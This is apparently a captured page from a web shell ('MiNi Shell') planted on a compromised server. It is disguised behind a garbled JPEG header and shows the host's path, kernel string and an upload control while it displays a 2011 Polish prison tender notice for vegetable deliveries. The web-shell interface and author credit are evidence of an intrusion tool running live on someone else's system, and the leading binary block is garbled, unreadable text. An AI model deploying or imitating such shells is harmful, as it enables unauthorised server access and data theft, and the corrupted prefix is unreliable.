JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111004/318498-N-2011.html

<p class="kh_header"><b>Trzebinia: Dostawa warzyw i  warzyw pozostałych dla potrzeb Zakładu Karnego w Trzebini</b><br>
<b>Numer ogłoszenia: 318498 - 2011; data zamieszczenia: 04.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Słowackiego 70, 32-540 Trzebinia, woj. małopolskie, tel. 032 6121374 w. 45, faks 032 6121551.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa warzyw i  warzyw pozostałych dla potrzeb Zakładu Karnego w Trzebini.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne dostawy warzyw i warzyw pozostałych dla potrzeb Zakładu Karnego w Trzebini. Dostarczane przedmioty zamówienia winny być w pierwszym gatunku, kategorii lub klasie jakości oraz z odpowiednim terminem ważności (przydatności do spożycia). Przedmioty zamówienia winny być dostarczane specjalistycznym transportem przystosowanym do przewozu żywności, zgodnie z obowiązującymi przepisami sanitarnymi i wymogami haccp. Dostawa przedmiotów zamówienia nastąpi na koszt i ryzyko Wykonawcy, ubezpieczonym transportem. Zamawiający dopuszcza opakowania według wyboru Wykonawcy z zastrzeżeniem dostarczania produktów w opakowaniach jednostkowych, szczelnych, spełniających wymagania higieny żywności. Opakowania są bezzwrotne, a ich koszt wliczony w cenę poszczególnych przedmiotów zamówienia.

2. Przedmiot zamówienia winien spełniać wymagania wynikające z obowiązujących krajowych przepisów prawa żywnościowego, w szczególności: ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U.10.136.914 j.t. ze zm.), ustawy z dnia 21 grudnia 2000 r. o jakość handlowej artykułów rolno-spożywczych (Dz.U.05.187.1577 j.t. ze zm.), rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 r. w sprawie znakowania środków spożywczych (Dz.U.07.137.966 ze zm.), rozporządzenia Ministra Zdrowia z dnia 6 czerwca 2007 r. w sprawie dostaw bezpośrednich środków spożywczych (Dz.U.07.112.774 ze zm.).

3. Dostarczane przedmioty zamówienia winny być zaopatrzone w etykiety handlowe sporządzone w języku polskim, zawierające niezbędne informacje o produkcie, co najmniej następujące dane: nazwę produktu, masę netto, nazwę dostawcy - producenta, adres, kraj pochodzenia, warunki przechowywania oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem/jeżeli dotyczy/.

4. Przedmiot zamówienia podzielony został odpowiednio na pakiety:

PAKIET I - warzywa - nomenklatura CPV 03221000-6
PAKIET II - warzywa pozostałe - nomenklatura CPV 15331130-7

5. Ofertę można składać na całość przedmiotu zamówienia lub na wybrany przez Wykonawcę pakiet, przy czym w każdym pakiecie wymagany jest pełen wyszczególniony w nim asortyment.
 
6. Opis pakietów:

PAKIET I - warzywa - nomenklatura CPV 03221000-6

marchew korzeń 
- nomenklatura CPV: 03221000-6
- polska norma: PN-84/R-75358
- ilość 3000 kg

Produkt: odmiana jednorodna i jadalna do bezpośredniego spożycia. Średnica korzenia mierzona w najszerszym przekroju od 2,5 cm do 5 cm. Cechy dyskwalifikujące: zwiędnięte,  zaparzone, zamarznięte, zapleśnione, nadgniłe, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby lub szkodniki, silne uszkodzenia mechaniczne,  puste przestrzenie w przekroju podłużnym. 

pietruszka korzeń 
- nomenklatura CPV: 03221000-6
- polska norma: PN-R-75370
- ilość 3000 kg

Produkt: odmiana jednorodna i jadalna do bezpośredniego spożycia. Średnica korzenia mierzona w najszerszym przekroju od 2,5 cm do 5 cm. Cechy dyskwalifikujące: zwiędnięte, zaparzone, zamarznięte, zapleśnione, nadgniłe, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby lub szkodniki, silne uszkodzenia mechaniczne,  puste przestrzenie w przekroju podłużnym. 

seler korzeń 
- nomenklatura CPV: 03221000-6
- polska norma: PN-R-75371
- ilość 3000 kg

Produkt: odmiana jednorodna i jadalna do bezpośredniego spożycia. Średnica korzenia mierzona w najszerszym przekroju od 7 cm do 10 cm. Cechy dyskwalifikujące: zwiędnięte, zaparzone, zamarznięte, zapleśnione, nadgniłe, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby lub szkodniki, silne uszkodzenia mechaniczne,  puste przestrzenie w przekroju podłużnym.

burak czerwony ćwikłowy 
- nomenklatura CPV: 03221000-6
- polska norma: PN-72/R-75360
- ilość 3000 kg

Produkt: odmiana jednorodna i jadalna do bezpośredniego spożycia. Minimalna średnica korzenia 6 cm. Cechy dyskwalifikujące: zwiędnięte, zaparzone, zamarznięte, zapleśnione, nadgniłe, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby lub szkodniki, silne uszkodzenia mechaniczne, puste przestrzenie w przekroju podłużnym. 

cebula 
- nomenklatura CPV: 03221000-6
- polska norma: PN-87/R-75357
- ilość 3000 kg

Produkt: odmiana jednorodna i jadalna do bezpośredniego spożycia. Minimalna średnica korzenia 4 cm. Cechy dyskwalifikujące: zwiędnięte, zaparzone, zamarznięte, zapleśnione, nadgniłe, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby lub szkodniki, silne uszkodzenia mechaniczne,  puste przestrzenie w przekroju podłużnym.

kapusta biała świeża 
- nomenklatura CPV: 03221000-6
- polska norma: PN-72/R-75362
- ilość 3000 kg

Produkt: odmiana jednorodna i jadalna do bezpośredniego spożycia. Cechy dyskwalifikujące: zwiędnięte, zaparzone, zamarznięte, zapleśnione, nadgniłe, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby lub szkodniki, silne uszkodzenia mechaniczne,  puste przestrzenie w przekroju podłużnym. 

kapusta czerwona świeża 
- nomenklatura CPV: 03221000-6
- polska norma: PN-72/R-75362
- ilość 3000 kg  

Produkt: odmiana jednorodna i jadalna do bezpośredniego spożycia. Cechy dyskwalifikujące: zwiędnięte, zaparzone, zamarznięte, zapleśnione, nadgniłe, obcy smak    i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby lub szkodniki, silne uszkodzenia mechaniczne,  puste przestrzenie w przekroju podłużnym. 

kapusta kiszona 
- nomenklatura CPV: 03221000-6
- polska norma: PN-72/A-77700  
- ilość 3000 kg

Produkt otrzymany z kapusty głowiastej, pokrojonej na skrawki dł. 100 mm, średnicy 2-3 cm, poddanej naturalnemu procesowi fermentacji mlekowej, smak słono kwaśny, wygląd soku jasno szary, opalizujący. 

ogórek kiszony 
- nomenklatura CPV: 03221000-6
- polska norma:  PN-A-77701
-  ilość 3000 kg

Produkt otrzymany ze świeżych ogórków, przypraw aromatyczno-smakowych, zalanych zalewą z dodatkiem soli i poddanych procesowi fermentacji mlekowej. Smak i zapach charakterystyczny dla ogórków prawidłowo ukwaszonych, aromatycznych, słono kwaśny, ogórki powinny być proste, o barwie oliwkowozielonej o różnych odcieniach, bez uszkodzeń mechanicznych i plam chorobowych, wielkość od 6 cm do 10cm i śr. 2,5 cm. 

ziemniak jadalny 
- nomenklatura CPV: 03221000-6
- polska norma: PN-75/R-74450
- ilość 39000 kg

Produkt: odmiana jednorodna i jadalna do bezpośredniego spożycia. Cechy dyskwalifikujące: zanieczyszczenia środkami ochrony roślinnych, zaparzenie i zapleśnienie, porośnięcie kiełkami powyżej 1 cm,  obce zapachy. 

PAKIET II - warzywa pozostałe - nomenklatura CPV 15331130-7

groch suszony łuskany 
- nomenklatura CPV: 15331130-7
- polska norma:  PN-73/A-74600
- ilość 660 kg

Produkt jednoodmianowy, o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń. 

fasola jaś suszona średnia 
- nomenklatura CPV: 15331130-7
- polska norma:  PN-73/A-74600
- ilość 660 kg

Produkt jednoodmianowy, o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń. 

7. Podane ilości są szacunkowe i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłaszania roszczeń z tytułu nie zrealizowanych dostaw lub podstawą do odmowy realizacji dostaw. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia wielkości dostaw w zależności od ilości osadzonych oraz wysokości stawki żywieniowej przypadającej na jednego skazanego. Wykonawcy będzie przysługiwało prawo do wynagrodzenia wyłącznie za faktycznie dostarczone ilości towaru.

8. Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia zamówienia dla poszczególnych produktów od szacunkowej ilości określonej w SIWZ oraz w formularzu ofertowym. Niemniej łączna wartość zamówienia z uwzględnieniem powyższych zmian, nie może przekroczyć wartości umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 15.33.11.30-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony przez Wykonawcę druk Formularz ofertowy na dostawę warzyw i warzyw pozostałych dla potrzeb Zakładu Karnego w Trzebini, który należy sporządzić wg wzoru druku załączonego przez Zamawiającego (załącznik nr 1 do SIWZ).

2. Zamawiający prosi aby, w przypadku, gdy druk Formularz ofertowy (załącznik nr 1 do SIWZ), oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy (załącznik nr 2 do SIWZ), oświadczenie o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy (załącznik nr 3 do SIWZ) podpisuje w imieniu Wykonawcy inna osoba, do oferty powinno być dołączone pełnomocnictwo z treści którego wynikać będzie umocowanie do podpisania oferty przez pełnomocnika. Pełnomocnictwo dołączone do oferty powinno być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert i złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Kwatermistrzowski
Zakład Karny w Trzebini
ul. Słowackiego 70
32-540 Trzebinia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2011 godzina 08:30, miejsce: Sekretariat 
Zakład Karny w Trzebini
ul. Słowackiego 70
32-540 Trzebinia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 31.10.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET I - warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. marchew korzeń - ilość 3000 kg

2. pietruszka korzeń - ilość 3000 kg

3. seler korzeń - ilość 3000 kg

4. burak czerwony ćwikłowy - ilość 3000 kg

5. cebula - ilość 3000 kg

6. kapusta biała świeża - ilość 3000 kg

7. kapusta czerwona świeża - ilość 3000 kg  

8. kapusta kiszona - ilość 3000 kg

9. ogórek kiszony -  ilość 3000 kg

10. ziemniak jadalny - ilość 39000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET II - warzywa pozostałe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. groch suszony łuskany - ilość 660 kg

2. fasola jaś suszona średnia - ilość 660 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com